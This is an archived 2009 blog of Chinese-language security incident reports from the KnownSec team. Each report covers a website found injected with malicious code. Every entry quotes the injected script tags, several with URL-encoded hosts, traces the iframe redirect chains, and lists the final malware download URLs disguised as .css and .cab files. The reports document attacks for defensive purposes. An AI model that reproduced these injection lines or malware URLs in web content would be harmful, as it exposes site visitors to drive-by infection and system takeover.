This theme is downloaded from wordpress themes website.

Archive for April, 2009

四川省执业医师网被植入恶意代码

发布时间:Wed Apr 29 2009 18:29:34 UTC+0800
最后更新时间:Wed Apr 29 2009 18:29:34 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 四川省执业医师网(http://www.scwst.org.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.scwst.org.cn/

网页被嵌入恶意链接代码:

090429snap9.jpg

<script src=http://%6D%62%72%33%2E%63%6E></script><script src=http://%6D%62%72%37%2E%63%6E></script><script src=http://%6D%62%72%38%2E%63%6E></script><script src=http://%33%38%7A%75%2E%63%6E></script><script src=http://%31%31%37%6C%61%2E%63%6E></script>
挂马分析:
[wide]http://www.scwst.org.cn/
 [script]http://%6d%62%72%33%2e%63%6e
  [frame]http://www.900990.cn/a10/a10.htm
   [frame]http://www.900990.cn/a10/new.html
    [script]http://www.900990.cn/a10/../zhin.js
    [frame]http://www.900990.cn/a10/../14.htm
    [frame]http://www.900990.cn/a10/fx.htm
    [frame]http://www.900990.cn/a10/../cx.htm
    [frame]http://www.900990.cn/a10/../real10.htm
    [frame]http://www.900990.cn/a10/../real11.htm
    [script]http://www.900990.cn/a10/../wewew.js
   [script]http://s33.cnzz.com/stat.php?1d=1382384&web_id=1382384ishow=pic
   [script]http://s33.cnzz.com/stat.php?id=1382384&web_id=1382384&show=pic
 [script]http://%6d%62%72%37%2e%63%6e
 [script]http://%6d%62%72%38%2e%63%6e
 [script]http://%33%38%7a%75%2e%63%6e
 [script]http://%31%31%37%6c%61%2e%63%6e
最终下载病毒文件:
http://www.19399.com.cn/lzz.css
http://www.19399.com.cn/as.css
http://www.19399.com.cn/bf.css
http://www.19399.com.cn/ms.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

点睛财务咨询网被植入恶意代码

发布时间:Wed Apr 29 2009 14:39:20 UTC+0800
最后更新时间:Wed Apr 29 2009 14:39:20 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 点睛财务咨询网(http://www.51djcwzx.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.51djcwzx.com/

网页被嵌入恶意链接代码:

090429snap8.jpg

<script  src=http://mstrh4.cn></script>
挂马分析:
[wide]http://www.51djcwzx.com/
 [script]http://mstrh4.cn
  [frame]http://count29.51yes.com/sa.aspx?id=294581529
  [frame]http://xyq.gds43.cn/1/01/index.htm?20-
   [frame]http://xyq.gds43.cn/1/01/index2.htm
    [frame]http://xyq.gds43.cn/1/01/ccqm.htm
    [script]http://xyq.gds43.cn/1/01/js.css
     [frame]http://xyq.gds43.cn/1/01/r814.htm
     [frame]http://xyq.gds43.cn/1/01/r8fl.htm
     [frame]http://xyq.gds43.cn/1/01/r8vod.htm
     [frame]http://xyq.gds43.cn/1/01/r8ff.htm
     [frame]http://xyq.gds43.cn/1/01/r8xxz.htm
     [frame]http://xyq.gds43.cn/1/01/r8bf.htm
     [frame]http://xyq.gds43.cn/1/01/r8122121.htm
   [script]http://js.tongji.cn.yahoo.com/1051060/ystat.js
   [script]http://count7.51much.com/cnt.php?uid=ua-1-12842&style=text&text=网站统计
最终下载病毒文件:
http://g11.t2s8.com/1/activxe.exe
http://g11.t2s8.com/1/xe.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

洪濑学区网站联盟被植入恶意代码

发布时间:Wed Apr 29 2009 14:35:47 UTC+0800
最后更新时间:Wed Apr 29 2009 14:35:47 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 洪濑学区网站联盟(http://teacherbbs.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://teacherbbs.net/

网页被嵌入恶意链接代码:

090429snap7.jpg

<script src=http://%6D%62%72%37%2E%63%6E></script><script src=http://%6D%62%72%32%2E%63%6E></script><script src=http://%6D%62%72%38%2E%63%6E></script><script src=http://%33%38%7A%75%2E%63%6E></script><script src=http://%31%31%37%6C%61%2E%63%6E></script>
挂马分析:
[wide]http://teacherbbs.net/
 [frame]http://www.wohenleile.cn/sina/a112.htm?01
 [script]http://%6d%62%72%37%2e%63%6e
  [frame]http://www.900990.cn/a10/a10.htm
   [frame]http://www.900990.cn/a10/new.html
    [script]http://www.900990.cn/a10/../zhin.js
    [frame]http://www.900990.cn/a10/../14.htm
    [frame]http://www.900990.cn/a10/fx.htm
    [frame]http://www.900990.cn/a10/../cx.htm
    [frame]http://www.900990.cn/a10/../real10.htm
    [frame]http://www.900990.cn/a10/../real11.htm
    [script]http://www.900990.cn/a10/../wewew.js
   [script]http://s33.cnzz.com/stat.php?1d=1382384&web_id=1382384&show=pic
   [script]http://s33.cnzz.com/stat.php?id=1382384&web_id=1382384&show=pic
 [script]http://%6d%62%72%32%2e%63%6e
 [script]http://%6d%62%72%38%2e%63%6e
 [script]http://%33%38%7a%75%2e%63%6e
 [script]http://%31%31%37%6c%61%2e%63%6e
最终下载病毒文件:
http://www.19399.com.cn/lzz.css
http://www.19399.com.cn/as.css
http://www.19399.com.cn/bf.css
http://www.19399.com.cn/ms.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

冀商网被植入恶意代码

发布时间:Wed Apr 29 2009 14:32:27 UTC+0800
最后更新时间:Wed Apr 29 2009 14:32:27 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 冀商网(http://tax.hbsr.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://tax.hbsr.cn/

网页被嵌入恶意链接代码:

090429snap6.jpg

<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://tax.hbsr.cn/
 [script]http://3b3.org/c.js
  [frame]http://23fffb.3322.org/a/a100.htm
   [frame]http://23fffb.3322.org/a/cnzz.htm
    [frame]http://23fffb.3322.org/a/yy.htm
    [frame]http://23fffb.3322.org/a/flash.htm
    [frame]http://23fffb.3322.org/a/qb.htm
    [frame]http://23fffb.3322.org/a/ippp.htm
    [frame]http://23fffb.3322.org/a/ip.htm
    [frame]http://23fffb.3322.org/a/02.htm
    [frame]http://23fffb.3322.org/a/lz.htm
    [frame]http://23fffb.3322.org/a/office.htm
   [script]http://w.cnzz.com/c.php?id=30014955&l=1
   [script]http://count7.51much.com/cnt.php?uid=ua-1-12981&style=text&text=网站统计
  [frame]http://23fffb.3322.org/a/a100.htm
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
http://xinfa8.com/xia/f1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

郑州公网被植入恶意代码

发布时间:Wed Apr 29 2009 14:28:33 UTC+0800
最后更新时间:Wed Apr 29 2009 14:28:33 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 郑州公网(http://371gw.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://371gw.com/

网页被嵌入恶意链接代码:

090429snap5.jpg

<script language=javascript src=http://%71%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
挂马分析:
[wide]http://371gw.com/
 [script]http://%71%2e%39%34%73%61%6f%6d%6d%2e%63%6f%6d/js.js
  [frame]http://bjyinghaiwei.com/360/rs.htm
   [frame]http://bjyinghaiwei.com/360/x.htm
    [script]http://bjyinghaiwei.com/360/all.css
    [frame]http://bjyinghaiwei.com/360/1.htm
    [frame]http://bjyinghaiwei.com/360/newlz.htm
    [frame]http://bjyinghaiwei.com/360/s.htm
    [frame]http://bjyinghaiwei.com/360/office.htm
    [frame]http://bjyinghaiwei.com/360/bf.htm
    [frame]http://bjyinghaiwei.com/360/cx.htm
    [frame]http://bjyinghaiwei.com/360/uuss.htm
    [frame]http://bjyinghaiwei.com/360/2.htm
    [frame]http://bjyinghaiwei.com/360/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
   [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
最终下载病毒文件:
http://www.zblianyi.com/p/a.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 2% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

丽江市爱心助学网被植入恶意代码

发布时间:Wed Apr 29 2009 14:21:28 UTC+0800
最后更新时间:Wed Apr 29 2009 14:21:28 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 丽江市爱心助学网(http://www.ljzxax.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.ljzxax.com/

网页被嵌入恶意链接代码:

090429snap4.jpg

<script language=’JavaScript’ type=’text/JavaScript’ src=’http://w3og.cn/org/’></script>
挂马分析:
[wide]http://www.ljzxax.com/
 [script]http://w3og.cn/org/
  [frame]http://62399.com.cn/a16/a16.htm
   [frame]http://62399.com.cn/a16/new.html
    [script]http://62399.com.cn/a16/../zhin.js
    [frame]http://62399.com.cn/a16/../14.htm
    [frame]http://62399.com.cn/a16/fx.htm
    [frame]http://62399.com.cn/a16/../cx.htm
    [frame]http://62399.com.cn/a16/../real10.htm
    [frame]http://62399.com.cn/a16/../real11.htm
    [script]http://62399.com.cn/a16/../wewew.js
   [script]http://s54.cnzz.com/stat.php?1d=1384534&web_id=1384534&show=pic2
   [script]http://s54.cnzz.com/stat.php?id=1384534&web_id=1384534&show=pic2
最终下载病毒文件:
http://www.19399.com.cn/lzz.css
http://www.19399.com.cn/as.css
http://www.19399.com.cn/bf.css
http://www.19399.com.cn/ms.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 2% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

购物天堂网被植入恶意代码

发布时间:Wed Apr 29 2009 14:14:41 UTC+0800
最后更新时间:Wed Apr 29 2009 14:14:41 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 购物天堂网(http://www.gougod.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.gougod.com/include/dedeajax2.js

网页被嵌入恶意链接代码:

090429snap2.jpg

document.writeln(”<script src=http:\/\/jiuqusee.8866.org\/ye.js><\/script>”)
挂马分析:
[wide]http://www.gougod.com/
 [script]http://www.gougod.com//include/dedeajax2.js
  [script]http://jiuqusee.8866.org/ye.js
   [frame]http://xyq.gds43.cn/1/12/index.htm?02
    [frame]http://xyq.gds43.cn/1/12/index2.htm
     [frame]http://xyq.gds43.cn/1/12/ccqm.htm
     [script]http://xyq.gds43.cn/1/12/js.css
      [frame]http://xyq.gds43.cn/1/12/r814.htm
      [frame]http://xyq.gds43.cn/1/12/r8fl.htm
      [frame]http://xyq.gds43.cn/1/12/r8vod.htm
      [frame]http://xyq.gds43.cn/1/12/r8ff.htm
      [frame]http://xyq.gds43.cn/1/12/r8xxz.htm
      [frame]http://xyq.gds43.cn/1/12/r8bf.htm
      [frame]http://xyq.gds43.cn/1/12/r8122121.htm
    [script]http://js.tongji.cn.yahoo.com/1051113/ystat.js
    [script]http://count7.51much.com/cnt.php?uid=ua-1-12897&style=text&text=网站统计

最终下载病毒文件:
http://g11.t2s8.com/1/activxe.exe
http://g11.t2s8.com/1/xe.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

工艺美术作品网被植入恶意代码

发布时间:Wed Apr 29 2009 14:08:55 UTC+0800
最后更新时间:Wed Apr 29 2009 14:08:55 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 工艺美术作品网(http://www.cnartcraft.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.cnartcraft.com/

网页被嵌入恶意链接代码:

090429snap1.jpg

<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://www.cnartcraft.com/
 [script]http://3b3.org/c.js
  [frame]http://23fffb.3322.org/a/a100.htm
   [frame]http://23fffb.3322.org/a/cnzz.htm
    [frame]http://23fffb.3322.org/a/yy.htm
    [frame]http://23fffb.3322.org/a/flash.htm
    [frame]http://23fffb.3322.org/a/qb.htm
    [frame]http://23fffb.3322.org/a/ippp.htm
    [frame]http://23fffb.3322.org/a/ip.htm
    [frame]http://23fffb.3322.org/a/02.htm
    [frame]http://23fffb.3322.org/a/lz.htm
    [frame]http://23fffb.3322.org/a/office.htm
   [script]http://w.cnzz.com/c.php?id=30014955&l=1
   [script]http://count7.51much.com/cnt.php?uid=ua-1-12981&style=text&text=网站统计
  [frame]http://23fffb.3322.org/a/a100.htm
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
http://xinfa8.com/xia/f1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 2% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

我要清洁网被植入恶意代码

发布时间:Tue Apr 28 2009 16:38:11 UTC+0800
最后更新时间:Tue Apr 28 2009 16:38:11 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 我要清洁网(http://www.51clean.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.51clean.com/

网页被嵌入恶意链接代码:

090428snap9.jpg

<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://www.51clean.com/
 [script]http://3b3.org/c.js
  [frame]http://l3f48f.3322.org/a/a100.htm
   [frame]http://l3f48f.3322.org/a/cnzz.htm
    [frame]http://l3f48f.3322.org/a/yy.htm
    [frame]http://l3f48f.3322.org/a/flash.htm
    [frame]http://l3f48f.3322.org/a/qb.htm
    [frame]http://l3f48f.3322.org/a/ippp.htm
    [frame]http://l3f48f.3322.org/a/ip.htm
    [frame]http://l3f48f.3322.org/a/02.htm
    [frame]http://l3f48f.3322.org/a/lz.htm
    [frame]http://l3f48f.3322.org/a/office.htm
   [script]http://w.cnzz.com/c.php?id=30014955&l=1
   [script]http://count7.51much.com/cnt.php?uid=ua-1-12981&style=text&text=网站统计
  [frame]http://l3f48f.3322.org/a/a100.htm
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js

最终下载病毒文件:
http://xinfa8.com/xia/f1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 2% [?]

网站挂马记录 lk 28 Apr 2009 No Comments

女生男生被植入恶意代码

发布时间:Tue Apr 28 2009 16:38:11 UTC+0800
最后更新时间:Tue Apr 28 2009 16:38:11 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 女生男生(http://www.21xyw.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.21xyw.com/

网页被嵌入恶意链接代码:

090428snap8.jpg

<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://www.21xyw.com/
 [script]http://3b3.org/c.js
  [frame]http://l3f48f.3322.org/a/a100.htm
   [frame]http://l3f48f.3322.org/a/cnzz.htm
    [frame]http://l3f48f.3322.org/a/yy.htm
    [frame]http://l3f48f.3322.org/a/flash.htm
    [frame]http://l3f48f.3322.org/a/qb.htm
    [frame]http://l3f48f.3322.org/a/ippp.htm
    [frame]http://l3f48f.3322.org/a/ip.htm
    [frame]http://l3f48f.3322.org/a/02.htm
    [frame]http://l3f48f.3322.org/a/lz.htm
    [frame]http://l3f48f.3322.org/a/office.htm
   [script]http://w.cnzz.com/c.php?id=30014955&l=1
   [script]http://count7.51much.com/cnt.php?uid=ua-1-12981&style=text&text=网站统计
  [frame]http://l3f48f.3322.org/a/a100.htm
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js

最终下载病毒文件:
http://xinfa8.com/xia/f1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 2% [?]

网站挂马记录 lk 28 Apr 2009 No Comments

« Previous PageNext Page »

Recommended: Buy movies online.